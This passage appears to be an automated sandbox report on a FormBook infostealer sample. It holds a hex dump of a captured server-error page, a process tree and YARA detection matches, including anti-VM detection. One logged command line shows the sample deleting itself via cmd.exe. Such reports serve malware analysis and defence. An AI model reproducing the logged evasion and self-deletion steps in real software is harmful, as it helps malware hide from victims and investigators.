65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e
                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div>


                                                      Code Manipulations

                                                      Statistics

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      Analysis Process: UOMp9cDcqZ.exe PID: 5852 Parent PID: 5816

                                                      General

                                                      Start time:16:56:19
                                                      Start date:11/06/2021
                                                      Path:C:\Users\user\Desktop\UOMp9cDcqZ.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Users\user\Desktop\UOMp9cDcqZ.exe'
                                                      Imagebase:0x6e0000
                                                      File size:993792 bytes
                                                      MD5 hash:15D907E7D9F8286E5053796C9D78FCEC
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.249409272.0000000003B69000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.249409272.0000000003B69000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.249409272.0000000003B69000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:low

                                                      Analysis Process: UOMp9cDcqZ.exe PID: 6412 Parent PID: 5852

                                                      General

                                                      Start time:16:56:29
                                                      Start date:11/06/2021
                                                      Path:C:\Users\user\Desktop\UOMp9cDcqZ.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\Desktop\UOMp9cDcqZ.exe
                                                      Imagebase:0x860000
                                                      File size:993792 bytes
                                                      MD5 hash:15D907E7D9F8286E5053796C9D78FCEC
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.245316233.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.245316233.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.245316233.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.315392989.0000000000DE0000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.315392989.0000000000DE0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.315392989.0000000000DE0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.314958304.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.314958304.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.314958304.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.315613623.0000000000EF0000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.315613623.0000000000EF0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.315613623.0000000000EF0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:low

                                                      Analysis Process: explorer.exe PID: 3472 Parent PID: 6412

                                                      General

                                                      Start time:16:56:31
                                                      Start date:11/06/2021
                                                      Path:C:\Windows\explorer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:
                                                      Imagebase:0x7ff693d90000
                                                      File size:3933184 bytes
                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Analysis Process: autochk.exe PID: 4860 Parent PID: 3472

                                                      General

                                                      Start time:16:56:58
                                                      Start date:11/06/2021
                                                      Path:C:\Windows\SysWOW64\autochk.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\SysWOW64\autochk.exe
                                                      Imagebase:0xd40000
                                                      File size:871424 bytes
                                                      MD5 hash:34236DB574405291498BCD13D20C42EB
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate

                                                      Analysis Process: colorcpl.exe PID: 4840 Parent PID: 3472

                                                      General

                                                      Start time:16:56:59
                                                      Start date:11/06/2021
                                                      Path:C:\Windows\SysWOW64\colorcpl.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\colorcpl.exe
                                                      Imagebase:0x380000
                                                      File size:86528 bytes
                                                      MD5 hash:746F3B5E7652EA0766BA10414D317981
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.494486167.0000000004490000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.494486167.0000000004490000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.494486167.0000000004490000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.492679624.0000000002540000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.492679624.0000000002540000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.492679624.0000000002540000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.494513701.00000000044C0000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.494513701.00000000044C0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.494513701.00000000044C0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:moderate

                                                      Analysis Process: cmd.exe PID: 6444 Parent PID: 4840

                                                      General

                                                      Start time:16:57:03
                                                      Start date:11/06/2021
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:/c del 'C:\Users\user\Desktop\UOMp9cDcqZ.exe'
                                                      Imagebase:0x8d0000
                                                      File size:232960 bytes
                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Analysis Process: conhost.exe PID: 5880 Parent PID: 6444

                                                      General

                                                      Start time:16:57:03
                                                      Start date:11/06/2021
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7ecfc0000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Disassembly

                                                      Code Analysis

                                                      Reset < >